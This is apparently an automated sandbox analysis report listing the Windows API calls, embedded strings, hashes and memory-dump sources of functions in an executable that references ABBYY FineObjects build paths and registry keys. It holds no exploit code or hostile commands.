                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CriticalSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$xMS$xMS
                                                                                                • API String ID: 1491966972-1092709693
                                                                                                • Opcode ID: 992278d03555386025969342af92261c66ef6f98881398604b7f011333a4452a
                                                                                                • Instruction ID: a36dc457c46d1d885cdd1b8940197ac92b6bbea18a0944288436dda74e0bb01f
                                                                                                • Opcode Fuzzy Hash: 992278d03555386025969342af92261c66ef6f98881398604b7f011333a4452a
                                                                                                • Instruction Fuzzy Hash: 9761C031A00209EBDB20DB54CC45FEFBBB4AF54704F0045AAF905AB281D7B8AE05CBD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004983E0: InterlockedDecrement.KERNEL32(?), ref: 0049843E
                                                                                                  • Part of subcall function 0047B760: InterlockedIncrement.KERNEL32(?), ref: 0047B867
                                                                                                  • Part of subcall function 0047B760: InterlockedDecrement.KERNEL32(?), ref: 0047B895
                                                                                                  • Part of subcall function 0047B760: InterlockedDecrement.KERNEL32(0046D5B2), ref: 0047B8C5
                                                                                                  • Part of subcall function 0047B760: InterlockedDecrement.KERNEL32(?), ref: 0047B8F5
                                                                                                  • Part of subcall function 0047B760: InterlockedDecrement.KERNEL32(000000FF), ref: 0047B925
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00498517
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00498533
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0049854F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0049856B
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00498587
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004985AE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: !$xMS$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-1878001318
                                                                                                • Opcode ID: 94edc85bd301db66de95cf790e15e9b8c0eb87125f9cd797ad58ae27dfc044ab
                                                                                                • Instruction ID: 07fc7877000748bfcc130562c83102d6ab6615b89d2193d5e72254cb93c6a754
                                                                                                • Opcode Fuzzy Hash: 94edc85bd301db66de95cf790e15e9b8c0eb87125f9cd797ad58ae27dfc044ab
                                                                                                • Instruction Fuzzy Hash: B641E631900549EBCB01DBA9CC01BEFFFB9AF45B14F14456EF501A3281DB78AE058BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 004130D7
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004130F3
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041310F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0041312B
                                                                                                • InterlockedDecrement.KERNEL32(00412BB6), ref: 00413193
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: LOGGING stopped at: $----------------------------------------------$Logging completed successfully!$xMS$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-583039911
                                                                                                • Opcode ID: df6896689b0a9d4b2729736b4da05f44923d8c1ca5212c738d87aea62586531c
                                                                                                • Instruction ID: 337ec9b4a699904a479fc5e1250f5cef426b2778533ce98873a7bf6ef83d6431
                                                                                                • Opcode Fuzzy Hash: df6896689b0a9d4b2729736b4da05f44923d8c1ca5212c738d87aea62586531c
                                                                                                • Instruction Fuzzy Hash: 5541C231901A5AEBCB01EFA5CC01AEFBBB8EF05715F14485DE541B7281DB78AF018B99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 00413610: InterlockedIncrement.KERNEL32(004F6640), ref: 0041365C
                                                                                                  • Part of subcall function 00413610: InterlockedDecrement.KERNEL32(004F6640), ref: 004136BA
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 00473314
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00473330
                                                                                                • InterlockedIncrement.KERNEL32 ref: 0047335E
                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,?,004F6640,80000001,0000010B,00000000,00000000), ref: 004733B0
                                                                                                • SetLastError.KERNEL32(00000000), ref: 004733B7
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 004733C1
                                                                                                • InterlockedDecrement.KERNEL32(000000FF), ref: 004733DA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CloseErrorLast
                                                                                                • String ID: Fine Objects$Software\ABBYY$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 3009240362-2367386582
                                                                                                • Opcode ID: 77ef7d24a7590971d7598185c1ce76ce908d1f4198cd02fc25d2e96cbc01ac46
                                                                                                • Instruction ID: f985632ca3c168f0a634de5065a078aae996a28c3fe568aecc16299ce10d171f
                                                                                                • Opcode Fuzzy Hash: 77ef7d24a7590971d7598185c1ce76ce908d1f4198cd02fc25d2e96cbc01ac46
                                                                                                • Instruction Fuzzy Hash: E841CF71901749ABDB01EFA5CD45BEEBFB4AF48715F004459F801B3281DBB86A04CBAA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00468DB0: InterlockedIncrement.KERNEL32(00530380), ref: 00468DD9
                                                                                                  • Part of subcall function 00413610: InterlockedIncrement.KERNEL32(004F6640), ref: 0041365C
                                                                                                  • Part of subcall function 00413610: InterlockedDecrement.KERNEL32(004F6640), ref: 004136BA
                                                                                                • InterlockedDecrement.KERNEL32(004E3737), ref: 00473494
                                                                                                • InterlockedDecrement.KERNEL32(004737BD), ref: 004734B0
                                                                                                • InterlockedIncrement.KERNEL32 ref: 004734DE
                                                                                                • RegCloseKey.ADVAPI32(00000000,?,00000000,004F6640,80000002,FFFFFFFF,00000000,00000000), ref: 00473530
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00473537
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00473541
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0047355A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CloseErrorLast
                                                                                                • String ID: Fine Objects$Software\ABBYY$xMS$xMS$xMS$xMS
                                                                                                • API String ID: 3009240362-2367386582
                                                                                                • Opcode ID: b6139ae64755b6b6b2ee8f265d7b5b4585f832b5c45b8f031b7bc44def924a1e
                                                                                                • Instruction ID: 7805d4060635d171af9fb5a8319df6f838165f3c1293be44c854a26cd65a1863
                                                                                                • Opcode Fuzzy Hash: b6139ae64755b6b6b2ee8f265d7b5b4585f832b5c45b8f031b7bc44def924a1e
                                                                                                • Instruction Fuzzy Hash: 1041C171901749EBDB01EFA5CD45BEEBFB4AF44715F004459F90173281DBB86A04CBAA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 0048B0CD
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0048B11E
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B12B
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0048B151
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B15E
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0048B184
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B191
                                                                                                • LeaveCriticalSection.KERNEL32(00534CA8), ref: 0048B1BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$CriticalSection$DecrementIncrement$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\nativefilesystem.cpp$xMS$xMS$xMS
                                                                                                • API String ID: 2342408639-1649603050
                                                                                                • Opcode ID: d4209a6b72bf1859b15f78311480fa05df73b5a5f4bc6bc2d3031ebcca7be29f
                                                                                                • Instruction ID: bac14d4363c3e71fb86fc9866e2b6d61ae838616c5e654fc13de9e93fe2dea79
                                                                                                • Opcode Fuzzy Hash: d4209a6b72bf1859b15f78311480fa05df73b5a5f4bc6bc2d3031ebcca7be29f
                                                                                                • Instruction Fuzzy Hash: 8231DF36100A06EFD711AF28DC09B6F7FA1FB45752F14492AF811A73A1D778AA10CBD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 0048B20D
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0048B25E
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B26B
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0048B291
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B29E
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0048B2C4
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0048B2D1
                                                                                                • LeaveCriticalSection.KERNEL32(00534CA8), ref: 0048B2FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$CriticalSection$DecrementIncrement$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\nativefilesystem.cpp$xMS$xMS$xMS
                                                                                                • API String ID: 2342408639-1649603050
                                                                                                • Opcode ID: 42eeac1fd3a98ac0e77256a7ad132f983c4d218bc3e5abf2eb21543102c8f0dd
                                                                                                • Instruction ID: 1efc1ecdda4d4c0b8c64283a2ef30d98ce269d072da85b112257976e4c34987e
                                                                                                • Opcode Fuzzy Hash: 42eeac1fd3a98ac0e77256a7ad132f983c4d218bc3e5abf2eb21543102c8f0dd
                                                                                                • Instruction Fuzzy Hash: 3031D036500606AFDB10AF28DC08B6F7FA4FF45721F10495AF811A73A1D778AA10CBD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetObjectW.GDI32(00000000,00000018,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004651CA
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,004E26F0,000000FF,?,004579C8,?,?), ref: 004651D4
                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,?,004579C8,00CC0020), ref: 004652B1
                                                                                                • BitBlt.GDI32(00000000,?,004579C8,?,?,?,00000000,00000000,00CC0020), ref: 00465358
                                                                                                • SelectObject.GDI32(?,?), ref: 00465379
                                                                                                • DeleteDC.GDI32(?), ref: 00465392
                                                                                                • DeleteObject.GDI32(00000000), ref: 004653B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Object$Delete$ErrorLastSelect
                                                                                                • String ID: $::GetObject( bitmap, sizeof(bmSrc), &bmSrc )$@fO$AWL::DrawAlphaBitmap$d:\build\teamagent\_work\1\s\0\awl\src\alphachannelawl.cpp
                                                                                                • API String ID: 2271317832-2290768200
                                                                                                • Opcode ID: 330678c0529b3f1f2044b311f077c36c7590050a15aa182a1f938dd5a7716213
                                                                                                • Instruction ID: 37f96da9cd1bd8b4d7a3ee16bd79c67f4df71a66d5e77982b76fe7e16acadc17
                                                                                                • Opcode Fuzzy Hash: 330678c0529b3f1f2044b311f077c36c7590050a15aa182a1f938dd5a7716213
                                                                                                • Instruction Fuzzy Hash: 84619A70A00249AFDF14DFA4D995BBEBFB5FF08700F14415AE901B7282E7B95A10CB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004472A1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004472B6
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 00447304
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0044730F
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00447337
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00447353
                                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0044742F
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 00447456
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$AllocStringWindow
                                                                                                • String ID: xMS$xMS$xMS$xMS
                                                                                                • API String ID: 3281912401-2407597445
                                                                                                • Opcode ID: 63b7e0368073885c2b66a5d04ca781238417a33e717f7b78edfb17105be12fd3
                                                                                                • Instruction ID: c1c6189cafbb3f1658f1c8b4bc281a24a61c672ce68f4eea31c8e2483cfc3244
                                                                                                • Opcode Fuzzy Hash: 63b7e0368073885c2b66a5d04ca781238417a33e717f7b78edfb17105be12fd3
                                                                                                • Instruction Fuzzy Hash: 9861C23160460ADBDB11DFA5C840BAEBBB4FF54304F10855EE805A7391DB38AE05DBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(-00000003), ref: 0048844A
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048856F
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00488D30: InterlockedIncrement.KERNEL32(00000001), ref: 00488D73
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004884AC
                                                                                                • InterlockedDecrement.KERNEL32(00000005), ref: 004884C3
                                                                                                • InterlockedDecrement.KERNEL32(00000001), ref: 004884F7
                                                                                                • LeaveCriticalSection.KERNEL32(00000001,?,00535528,00000001,00000000,00000001,00535564,?,00535528,00000001), ref: 0048851D
                                                                                                • InterlockedDecrement.KERNEL32(00000000), ref: 0048853B
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\inc\object.h, xrefs: 0048845D
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp, xrefs: 0048840E
                                                                                                • @fO, xrefs: 00488467
                                                                                                • @fO, xrefs: 00488418
                                                                                                • dUS, xrefs: 004883F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CriticalIncrementSection$LeaveValue$EnterException@8Throw
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\inc\object.h$d:\build\teamagent\_work\1\s\0\fineobjects\src\resourceinfo.cpp$dUS
                                                                                                • API String ID: 2934802076-3615575718
                                                                                                • Opcode ID: 6e93ab39d5d8b0b259deb4b8841470b656caf9416890c6c1e999d4a942b70052
                                                                                                • Instruction ID: 2a48eb479b4c0be6bc491e3360d9808df77dd07a4aa82c10b6e7bd04d5bc05a7
                                                                                                • Opcode Fuzzy Hash: 6e93ab39d5d8b0b259deb4b8841470b656caf9416890c6c1e999d4a942b70052
                                                                                                • Instruction Fuzzy Hash: 3B51B032A00214AFDB20EF58C948B6FBBA4FF44B14F19895EE955AB391D774ED00CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00466620: IsWindow.USER32(?), ref: 00466630
                                                                                                  • Part of subcall function 00466620: SendMessageW.USER32(00000000,000000B2,00000000,?), ref: 00466684
                                                                                                • SetWindowOrgEx.GDI32 ref: 00466206
                                                                                                • SetMapMode.GDI32(?,00000006), ref: 00466215
                                                                                                • DPtoLP.GDI32(?,?,00000002), ref: 00466223
                                                                                                • SetMapMode.GDI32(?,00000000), ref: 0046622E
                                                                                                  • Part of subcall function 0042F910: IsWindow.USER32(?), ref: 0042F926
                                                                                                  • Part of subcall function 0042F910: GetClientRect.USER32 ref: 0042F972
                                                                                                  • Part of subcall function 0042F910: GetLastError.KERNEL32(?,00000000,00000009,?,0043ED7E,?,?,?,?,00000000,00000000,00000000,00000000,?), ref: 0042F97C
                                                                                                  • Part of subcall function 004665B0: IsWindow.USER32(?), ref: 004665C2
                                                                                                  • Part of subcall function 004665B0: SendMessageW.USER32(?,000000D7,00000000,?), ref: 0046660B
                                                                                                • SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0046628B
                                                                                                • IsWindow.USER32(?), ref: 0046629D
                                                                                                • SendMessageW.USER32(?,00000439,00000001,?), ref: 004662DC
                                                                                                • IsWindow.USER32(?), ref: 004662F2
                                                                                                • SendMessageW.USER32(?,00000439,00000001,00000000), ref: 00466328
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$MessageSend$Mode$ClientErrorLastRect
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\richeditctrlawl.h
                                                                                                • API String ID: 4189402136-1366592789
                                                                                                • Opcode ID: a51adcdc24d1b11f6067740a1bb0ca1ba4c9c793a1a0ec0b1060c89a58f98d3a
                                                                                                • Instruction ID: ec554f323bea093fd89dbaa6d0876d18031d7942b55d9012075d9ecd0d217798
                                                                                                • Opcode Fuzzy Hash: a51adcdc24d1b11f6067740a1bb0ca1ba4c9c793a1a0ec0b1060c89a58f98d3a
                                                                                                • Instruction Fuzzy Hash: 7A418371644304AFD710AF15DC02F6BBBE9BFC4704F01452EFA84A6291EBB5E910CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004131F7
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0041320C
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0041321E
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00413230
                                                                                                  • Part of subcall function 004770E0: InterlockedIncrement.KERNEL32(00530380), ref: 00477107
                                                                                                  • Part of subcall function 00413610: InterlockedIncrement.KERNEL32(004F6640), ref: 0041365C
                                                                                                  • Part of subcall function 00413610: InterlockedDecrement.KERNEL32(004F6640), ref: 004136BA
                                                                                                  • Part of subcall function 00477630: InterlockedIncrement.KERNEL32(00530380), ref: 00477668
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0041328F
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 004132AB
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 004132C7
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 004132E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Increment$Decrement
                                                                                                • String ID: xMS$xMS$xMS$xMS
                                                                                                • API String ID: 4289621856-2407597445
                                                                                                • Opcode ID: 2618147e2779a60bfed0135af6a84a666125c7deebc6616c832cdcbc00151b98
                                                                                                • Instruction ID: 1de5a5cdba908bf28662f556ce2bacdc19be5ccb39f346e0e9daf07d03e02afc
                                                                                                • Opcode Fuzzy Hash: 2618147e2779a60bfed0135af6a84a666125c7deebc6616c832cdcbc00151b98
                                                                                                • Instruction Fuzzy Hash: 65417E72901659ABCB02EF95CC01AEFBFB8BF44704F0445AAE501B3281D7B95F098BE5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 004A2130: LsaOpenPolicy.ADVAPI32(00000000,?,00000001,?), ref: 004A2185
                                                                                                  • Part of subcall function 004A2130: LsaNtStatusToWinError.ADVAPI32(00000000), ref: 004A2196
                                                                                                  • Part of subcall function 004A2130: SetLastError.KERNEL32(00000000), ref: 004A219F
                                                                                                  • Part of subcall function 004A2130: LsaQueryInformationPolicy.ADVAPI32(00000000,00000005,?), ref: 004A21C7
                                                                                                  • Part of subcall function 004A2130: LsaNtStatusToWinError.ADVAPI32(00000000), ref: 004A21D2
                                                                                                  • Part of subcall function 004A2130: SetLastError.KERNEL32(00000000), ref: 004A21D5
                                                                                                  • Part of subcall function 004A2130: LsaClose.ADVAPI32(00000000), ref: 004A21E1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 004A2285
                                                                                                • InterlockedIncrement.KERNEL32(00000000), ref: 004A22AD
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 004A22B4
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A22E6
                                                                                                • LsaFreeMemory.ADVAPI32(00000000), ref: 004A2309
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004A2312
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004A2324
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
